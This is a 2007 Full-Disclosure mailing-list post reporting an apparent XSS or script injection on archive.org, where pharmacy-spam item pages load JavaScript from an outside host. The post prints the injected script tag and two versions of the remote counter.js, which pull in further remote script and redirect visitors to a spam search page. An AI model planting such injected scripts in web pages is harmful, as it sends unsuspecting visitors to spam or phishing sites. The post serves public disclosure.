[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] www.archive.org <--- XSS (and under attack)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] www.archive.org <--- XSS (and under attack)
- From: wac <waldoalvarez00@xxxxxxxxx>
- Date: Tue, 25 Sep 2007 04:28:29 -0400
Hello:
I could take a while to investigate this more but I have no
time ATM (veeery busy) and the website is under attack. (should be a
matter to try that script on some form. Get a virtual pass for the library,
digg in the book publishing forms and report back)
Try this links:
http://www.archive.org/details/BuyPhentermineOnline_979
http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery
Parts of the HTML follows to help spot the hole
...
<a href="/search.php?query=subject:%22 free delivery%22"> free
delivery</a></p></div><p xmlns:fo="http://www.w3.org/1999/XSL/Format";
class="content" style="text-align:left;"><script language="javascript" src="
http://rico05.com/counter/counter.js?id=950&key=buy+phentermine";></script>
...
/--------- counter.js (called directly) ---------/
var ref = escape(document.referrer);
document.write('\<script language=\"javascript\" src=\"
http://rico05.com/counter/counter.js?ref=' + ref + '\"\>\<\/script\>');
/----- EOF -----/
/--------- counter.js (with referer forged) ---------/
document.location = 'http://rico05.com/search/?said=951&q=buy phentermine';
/----- EOF -----/
And that's it. A lot of money spamming users.
Who is said=951? Ask rico05.com if they are not a bunch of phishers should
tell you.
Regards
Waldo Alvarez
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/